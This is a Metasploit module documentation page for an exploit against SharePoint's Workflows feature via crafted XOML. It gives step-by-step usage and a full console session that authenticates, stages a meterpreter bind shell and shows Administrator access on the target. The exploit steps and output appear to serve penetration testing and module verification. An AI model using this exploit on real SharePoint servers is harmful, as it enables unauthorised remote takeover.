## Vulnerable Application

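This module exploits a vulnerability in SharePoint and its .NET backend
that allows an attacker to execute commands by sending specially crafted XOML
data to SharePoint through the Workflows functionality. The module
authenticates to the target with Windows credentials (`DOMAIN`, `USERNAME` and
`PASSWORD` are all required options), so a valid account is needed.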

## Verification Steps

  1. Install the application
  1. Start msfconsole
  1. Do: `use exploit/windows/http/sharepoint_workflows_xoml`
  1. Set the target options (`RHOSTS`, `RPORT` and `SSL`) as appropriate
  1. Set the authentication options (`DOMAIN`, `USERNAME` and `PASSWORD`) as appropriate
  1. Do: `run`
  1. You should get a shell

## Scenarios

### SharePoint 2019 on Server 2016

```
msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options

Module options (exploit/windows/http/sharepoint_workflows_xoml):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKGROUP        yes       The domain to use for Windows authentication
   PASSWORD   Password1        yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.14   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the SharePoint application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   administrator    yes       Username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.159.14   no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Windows Powershell


msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Started bind TCP handler against 192.168.159.14:4444
[*] Sending stage (206403 bytes) to 192.168.159.14
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.159.14:4444) at 2020-03-23 18:11:44 -0400

meterpreter > sysinfo
Computer        : SHRPNT2019-P
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT2019P
Logged On Users : 14
Meterpreter     : x64/windows
meterpreter > getuid
Server username: SHRPNT2019P\Administrator
meterpreter >
```